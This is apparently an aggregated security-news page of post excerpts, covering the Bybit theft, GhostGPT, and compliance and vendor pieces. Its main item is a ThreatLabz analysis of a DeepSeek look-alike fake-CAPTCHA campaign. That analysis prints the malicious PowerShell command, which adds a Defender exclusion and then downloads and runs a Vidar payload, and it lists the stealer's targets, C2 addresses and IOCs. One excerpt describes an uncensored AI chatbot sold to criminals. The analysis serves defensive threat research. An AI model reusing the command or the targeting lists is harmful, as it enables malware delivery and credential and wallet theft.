Security Boulevard

Articles related to cyber risk quantification, cyber risk management, and cyber resilience.

The post What Is Cybersecurity Performance Management? | Kovrr appeared first on Security Boulevard.

It looks like a very sophisticated attack against the Dubai-based exchange Bybit:

Bybit officials disclosed the theft of more than 400,000 ethereum and staked ethereum coins just hours after it occurred. The notification said the digital loot had been stored in a “Multisig Cold Wallet” when, somehow, it was transferred to one of the exchange’s hot wallets. From there, the cryptocurrency was transferred out of Bybit altogether and into wallets controlled by the unknown attackers.

[…]

…a subsequent investigation by Safe found no signs of unauthorized access to its infrastructure, no compromises of other Safe wallets, and no obvious vulnerabilities in the Safe codebase. As investigators continued to dig in, they finally settled on the true cause. Bybit ultimately said that the fraudulent transaction was “manipulated by a sophisticated attack that altered the smart contract logic and masked the signing interface, enabling the attacker to gain control of the ETH Cold Wallet.”...

The post North Korean Hackers Steal $1.5B in Cryptocurrency appeared first on Security Boulevard.

It's been a while since I've shared an update on the work Sonatype is doing in the open source ecosystem, so I'm excited to share an update on a few things we're doing in the space — and how it led to the creation of a new security standard in the Open Source Security Foundation (OpenSSF).

The post Behind the Baseline: Reflecting on the launch of the Open Source Project Security Baseline appeared first on Security Boulevard.

Cary, NC, Feb. 25, 2025, CyberNewswire — INE, the leading provider of networking and cybersecurity training and certifications, today announced its recognition as an enterprise and small business leader in online course providers and cybersecurity professional development, along with … (more…)

The post News alert: INE secures spot in G2’s 2025 Top 50 education software rankings first appeared on The Last Watchdog.

The post News alert: INE secures spot in G2’s 2025 Top 50 education software rankings appeared first on Security Boulevard.

GhostGPT is revolutionizing cybercrime by providing hackers with an AI tool that bypasses ethical guardrails found in mainstream models. Available as little as $150, it enables even novice attackers to generate malicious code, craft phishing emails, and automate social engineering at scale.

The post GhostGPT: An Uncensored AI Chatbot Empowering Cybercriminals appeared first on Security Boulevard.

IntroductionThe rapid rise of generative AI tools has created opportunities and challenges for cybercriminals. In an instant, industries are being reshaped while new attack surfaces are being exposed. DeepSeek AI chatbot that launched on January 20, 2025, quickly gained international attention, making it a prime target for abuse. Leveraging a tactic known as brand impersonation, threat actors craft fraudulent websites designed to impersonate DeepSeek and mislead unsuspecting users into divulging sensitive information and/or executing harmful malware. Zscaler ThreatLabz has highlighted concerns about open source generative AI tools, like DeepSeek, being misused by threat actors to enhance exploitation and data theft strategies. This blog post delves into a DeepSeek-themed malware campaign that abuses the popularity of the name. Alongside brand impersonation, this attack chain demonstrates techniques, including clipboard injection to deliver malicious PowerShell commands, the deployment of the Vidar information stealer, and the use of legitimate platforms like Telegram and Steam to conceal command-and-control (C2) communication. We also examine additional look-alike domains designed to lure users into interacting with malicious webpages.Key Takeaways Cybercriminals are leveraging DeepSeek's popularity by creating websites hosted on fake look-alike domains to deceive users and deliver the Vidar information stealer. The malware campaign uses a fake CAPTCHA page to conduct clipboard injection, secretly copying a malicious PowerShell command for users to execute.It is crucial for organizations to have well defined policies and security controls governing the use of generative AI models and applications in their environment, both for sanctioned and unsanctioned applications.DeepSeek Look-Alike DomainsThreatLabz has identified numerous domains leveraging the popularity of DeepSeek that imitate the official website and affiliated websites. These fraudulent domains are used to facilitate a variety of malicious activities, including cryptocurrency pump-and-dump schemes, fake forums designed to steal user credentials, bogus gift card scams, and counterfeit gambling platforms. Below is a list of domains observed impersonating DeepSeek during our investigation.presales-deepseek[.]comdeepseekpg[.]betdeepseekaiagent[.]livedeepseekjulebu[.]shopdeepseekr1[.]clubdeepseekonchain[.]comdeepseek-v3[.]xyzdeepseek-pro[.]clouddeepseekai[.]clubdeepseekpepe[.]sitedeepseekai[.]globaldeepseekpepe-eth[.]comdeepseeksol[.]comtrydeepseek[.]comsale-deepseek[.]comdeepseekpumpfun[.]comdeepseektrump[.]xyzdeepseekaiclaim[.]livedeepseek2025[.]xyzdeepseekfree[.]xyzdeepseekai[.]todaydeepseek-adverting[.]icudeepseekclaim[.]livedeepseekt[.]orgdeepseek-trump[.]xyzdeepseek4youtube[.]comdeepseekaigames[.]sitedeepseek[.]expressdeepseeksky[.]comdeepseekfart[.]xyzchatdeepseek[.]appdeepseekaieth[.]comdeepseekcaptcha[.]topdeepseek[.]topdeepseekai-eth[.]fundeepseek[.]appdeepseek[.]art Technical AnalysisAttack chainIn this section, we will describe an attack chain that abuses the DeepSeek brand to spread malware. The malware campaign begins with attackers creating a fake domain that impersonates DeepSeek. This website asks visitors to complete a registration process, redirecting them to a fake CAPTCHA page. Malicious JavaScript on the page copies a malicious PowerShell command to the user's clipboard, prompting them to execute it. If the user runs the PowerShell command, a packed Vidar executable (1.exe) will be downloaded and executed.An overview of the attack chain is shown below:Figure 1: A diagram illustrating the attack chain employed in this campaign, which leveraged a look-alike domain and DeepSeek's branding to deceive users.1. Domain setupThreatLabz examined a suspicious look-alike domain called deepseekcaptcha[.]top. The domain is designed to impersonate the DeepSeek brand through a webpage that urges users to complete a "verification" process. The webpage can be seen below:Figure 2: Example webpage impersonating the DeepSeek brand to spread malware.A WHOIS lookup reveals that the domain is relatively new, registered on January 31, 2025, shortly after the launch of the DeepSeek chatbot. Newly registered domains are often a red flag for malicious activity, particularly as ThreatLabz observed a 400%+ increase in encrypted attacks leveraging newly registered domains last year. This timing strongly suggests that the threat actors behind the website are attempting to capitalize on the widespread attention and impact DeepSeek has generated across various sectors.2. Deceptive verification promptThe webpage prompts users to complete a partner registration, as shown in the figure below:Figure 3: The DeepSeek-themed webpage prompting users to complete a fake partner registration.When the user clicks on the verification button, they are redirected to a fake CAPTCHA page, like the one shown in the figure below. Figure 4: Fake CAPTCHA lure in DeepSeek-themed malware scam. Once the user clicks on the "I’m not a robot" confirmation, JavaScript on the page automatically copies malicious code to the user's clipboard and prompts them to execute the command in the Windows Run window, as shown in the figure below.Figure 5: Fake CAPTCHA instructions to dupe a victim into executing malicious code.3. Malicious clipboard injectionThe PowerShell command copied to the clipboard is shown below:cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''Examining the source code of the verification page reveals the JavaScript responsible for copying the malicious code to the user’s clipboard, as shown below.Figure 6: JavaScript clipboard functions used to copy malicious PowerShell commands to the user’s clipboard.4. Execution of trojan dropperWhen executed, the PowerShell command downloads and launches a malicious file (in this case named 1.exe). This file is a packed sample of Vidar.5. Vidar deploymentOnce Vidar malware is executed on the victim’s system, it initiates its primary objective: harvesting sensitive data. This data includes user credentials, cryptocurrency wallet information, browser cookies, and personal files. The malware employs social media platforms, such as Telegram, to conceal its C2 infrastructure.Payload behavior and targeted dataVidar extracts data from specific locations within the victim’s file system and registry to locate sensitive assets.Targeting cryptocurrency walletsVidar is programmed to search for files and configurations related to major cryptocurrency wallets. When a cryptocurrency wallet is detected on the victim’s system, Vidar queries specific registry keys and file paths to exfiltrate sensitive data such as wallet files.For this DeepSeek related attack, the Vidar sample was configured to target the following browser extensions related to cryptocurrency:MetaMaskTezBoxLeap Cosmos WalletTronLinkGobyMultiversX DeFi WalletBinanceChainWalletRoninWalletEdgeFrontier WalletYoroiUniSat WalletSafePalCoinbaseAuthenticatorSubWallet - PolkadotGuardaGAuth AuthenticatorWalletiWalletTroniumFluvi WalletRoninWalletTrust WalletGlass Wallet - Sui WalletNeoLineExodus Web3 WalletMorphis WalletCloverWalletBraavosXverse WalletLiqualityWalletEnkryptCompass Wallet for SeiTerra_StationOKX Web3 WalletHAVAH WalletKeplrSenderElli - Sui WalletAuroWalletHashpackVenom WalletPolymeshWalletGeroWalletPulse Wallet ChromiumICONexPontem WalletMagic Eden WalletCoin98FinnieBackpack WalletEVER WalletLeap TerraTonkeeper WalletKardiaChainMicrosoft AutoFillOpenMask WalletRabbyBitwardenSafePal WalletPhantomKeePass TuskBitget WalletOxygen (Atomic)KeePassXC-BrowserTON WalletPaliWalletRise - Aptos WalletMyTonWalletNamiWalletRainbow WalletUniswap ExtensionSolflareNightlyAlephium WalletCyanoWalletEcto WalletTalisman WalletKHCCoinhub Targeting browser dataVidar also actively searches victim systems for browser-related assets, including stored cookies, saved login credentials, and autofill data. The Vidar sample related to the DeepSeek lure was configured to target the list of browsers shown below:\Google\Chrome\User Data\Microsoft\Edge Dev\User Data\Google\Chrome SxS\User Data\360Browser\Browser\User Data\Chromium\User Data\Tencent\QQBrowser\User Data\Vivaldi\User Data\CryptoTab Browser\User Data\Epic Privacy Browser\User DataOpera: \Opera Software\CocCoc\Browser\User DataOpera GX: \Opera Software\BraveSoftware\Brave-Browser\User DataOpera Crypto: \Opera Software\CentBrowser\User Data\Mozilla\Firefox\Profiles\Microsoft\Edge\User Data\Moonchild Productions\Pale Moon\Profiles\Microsoft\Edge SxS\User Data\Thunderbird\Profile\Microsoft\Edge Beta\User Data The Vidar C2 server also instructed infected systems to search for the following filenames and extensions:*wallet*.**upbit*.**exodus*.**seed*.**bcex*.**metamask*.**btc*.**bithimb*.**myetherwallet*.**key*.**hitbtc*.**electrum*.**2fa*.**bitflyer*.**bitcoin*.**crypto*.**kucoin*.**blockchain*.**coin*.**huobi*.**coinomi*.**private*.**poloniex*.**words*.**2fa*.**kraken*.**meta*.**auth*.**okex*.**mask*.**ledger*.**binance*.**eth*.**trezor*.**bitfinex*.**recovery*.**pass*.**gdax*.**.txt*wal*.**ethereum*.* Network communicationVidar facilitates exfiltration of stolen data to attacker-controlled servers by communicating with hardcoded endpoints. Vidar abuses legitimate services like Telegram and Steam to provide the location of C2 infrastructure.In this attack, the malware utilizes the following infrastructure to resolve the Vidar C2 infrastructure:A publicly accessible Steam community profile (https://steamcommunity[.]com/profiles/76561199825403037).A Telegram channel (https://t[.]me/b4cha00).The following C2 IP addresses are associated with this campaign:77.239.117[.]22295.216.178[.]5795.217.246[.]174The botnet ID for this Vidar campaign was oomaino5.ConclusionThe virality of DeepSeek and the speed at which cybercriminals leveraged it to create look-alike domains highlight how precarious AI technology can be. While AI is a wonderful tool for productivity, it also provides threat actors with more opportunities for abuse, particularly through brand impersonation. Additionally, the proliferation of AI enables cybercriminals to launch more sophisticated and effective attacks with improved strategies.As AI adoption continues to expand, organizations must strengthen their security measures and educate users to recognize and mitigate threats. Zscaler ThreatLabz remains committed to uncovering and combating these threats to protect our customers.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to Vidar at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for Vidar.Figure 7: Zscaler Cloud Sandbox report for Vidar.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators associated with Vidar and other related threats, as listed below:Win32.Trojan.ClearFakeJS.Injection.ClearFakePS.Downloader.ClearFakeWin32.PWS.VidarIndicators Of Compromise (IOCs) IndicatorDescriptionsteamcommunity[.]com/profiles/76561199825403037Steam profile used to locate Vidar for C2 infrastructure.t[.]me/b4cha00Telegram channel used by Vidar to locate C2 infrastructure.77[.]239[.]117[.]222Vidar C2 IP address. 95[.]216[.]178[.]57Vidar C2 IP address.95[.]217[.]246[.]174Vidar C2 IP address.sailiabot[.]comVidar C2 domain.9f680720826812af34cbc66e27e0281f Packed Vidar sample.e9a39ed8c569c9e568740e4eb93a6eecVidar sample.

The post DeepSeek Lure Using CAPTCHAs To Spread Malware appeared first on Security Boulevard.

At Seceon’s 2025 Q1 Innovation and Certification Days, Seceon’s Bhabani Prasad engaged in a conversation with cybersecurity experts Deeptesh Chandra and German Moreno about the evolving threat landscape and how Seceon’s AI-powered platform is setting new standards in cybersecurity. The discussion explored Seceon’s competitive strengths, AI-driven threat prevention, and the platform’s ability to consolidate multiple

The post Seceon’s AI-Driven Cybersecurity: Insights from Bhabani Prasad, Deeptesh Chandra, and German Moreno appeared first on Seceon Inc.

The post Seceon’s AI-Driven Cybersecurity: Insights from Bhabani Prasad, Deeptesh Chandra, and German Moreno appeared first on Security Boulevard.

Author/Presenter: The Magician

Our sincere appreciation to DEF CON, and the Authors/Presenters for publishing their erudite DEF CON 32 content. Originating from the conference’s events located at the Las Vegas Convention Center; and via the organizations YouTube channel.

Permalink

The post DEF CON 32 – Doors, Cameras & Mantraps: Oh My! appeared first on Security Boulevard.

2024 was a year of increasing email security risks for businesses. Email is the number one attack vector for cybercriminals, and phishing attacks remain the top threat to email users.

The 2024 Mimecast State of Email & Collaboration Security Report found that among IT leadership:

• 80% are concerned about new email-based threats posed by AI
• 41% of organizations experienced more email-based threats in 2024
• 56% worry their organizations' cyber defenses cannot keep pace with new threats.

But do perceived threats match up with actual threats?

Are organizations even using the right tools and mindset when it comes to email security?

The post 5 Essential Email Security Tips for Businesses appeared first on Security Boulevard.

Veriti’s latest research identifies key false positive triggers in cloud environments, their underlying causes, and their impact on businesses. By understanding these issues, security teams can refine their defenses and reduce unnecessary alerts without compromising protection. Two Main Causes of False Positives in Cybersecurity Protections Brute Force and Protocol-Based False Positives False positives often stem […]

The post Are False Positives Killing Your Cloud Security? Veriti Research Reveals  appeared first on VERITI.

The post Are False Positives Killing Your Cloud Security? Veriti Research Reveals  appeared first on Security Boulevard.

As organizations grow so does their infrastructure, often without a well-designed underlying infrastructure to support this growth. At GuidePoint Security […]

The post Untangling AWS Networks with Cloud WAN appeared first on Security Boulevard.

Cary, NC, 25th February 2025, CyberNewsWire

The post INE Secures Spot in G2’s 2025 Top 50 Education Software Rankings appeared first on Security Boulevard.

As data continues to fuel AI’s evolution, the fight for privacy will become more complex and more urgent than ever before.

The post Data Entanglement, AI and Privacy: Why the Law Isn’t Ready appeared first on Security Boulevard.

With risks increasing and regulatory mandates growing in number, many organizations need a unified approach to compliance and security.

The post A Gold Standard for Compliance: Why ISO 27001 is More Relevant Than Ever  appeared first on Security Boulevard.

The countdown to compliance is in its final stretch. With the third and final phase of PCI DSS 4.0 requirements taking effect on March 31, 2025, organizations are under increasing pressure to ensure their client-side security measures meet the new requirements.   At Imperva, we’re committed to helping our customers navigate these challenges confidently and efficiently. […]

The post How to Comply with PCI DSS 4.0 Requirements 6.4.3 and 11.6.1 appeared first on Blog.

The post How to Comply with PCI DSS 4.0 Requirements 6.4.3 and 11.6.1 appeared first on Security Boulevard.

Google Cloud is putting quantum-safe digital signatures into its Key Management Service, the latest steps int the cloud giant's plans to adopt post-quantum cryptography through its portfolio to mitigate security risks that likely will come with the arrival of fault-tolerant quantum computers.

The post Google Cloud Takes Steps to Guard Against Quantum Security Risks appeared first on Security Boulevard.

Get details on Legit's new capabilities that allow AppSec teams to focus on the issues posing real risk.

The post Announcing Legit Context: The Missing Link to True Business-Driven ASPM appeared first on Security Boulevard.

Are You Confident in Your Cloud Security Strategy? How confident are you in your cybersecurity strategy? The cyber threats demands a robust and comprehensive approach to securing all aspects of your digital assets. This security extends beyond human users and should include Non-Human Identities (NHIs) too. Understanding Non-Human Identities (NHIs) NHIs, or machine identities, are […]

The post Confident in Your Cloud Security Strategy? appeared first on Entro.

The post Confident in Your Cloud Security Strategy? appeared first on Security Boulevard.

Are You Leveraging the Full Potential of Secrets Management? Ever wondered how to safeguard your digital assets effectively? The answer lies in secrets management. Ensuring security, compliance, and efficiency, it is a pivotal aspect of cybersecurity that deals with the protection of secure credentials, also called Non-Human Identities (NHIs), and their associated secrets. Non-Human Identities: […]

The post Feeling Empowered by Your Secrets Management? appeared first on Entro.

The post Feeling Empowered by Your Secrets Management? appeared first on Security Boulevard.

Is Your Organization Truly in Control of its Non-Human Identities? The increasing complexity of cyber interactions has necessitated a shift in our approach to security. One area that is often overlooked in traditional security models is the management of Non-Human Identities (NHIs). This critical aspect of access control plays a crucial role. Now, ask yourself, […]

The post Can You Fully Control Your NHIs? appeared first on Entro.

The post Can You Fully Control Your NHIs? appeared first on Security Boulevard.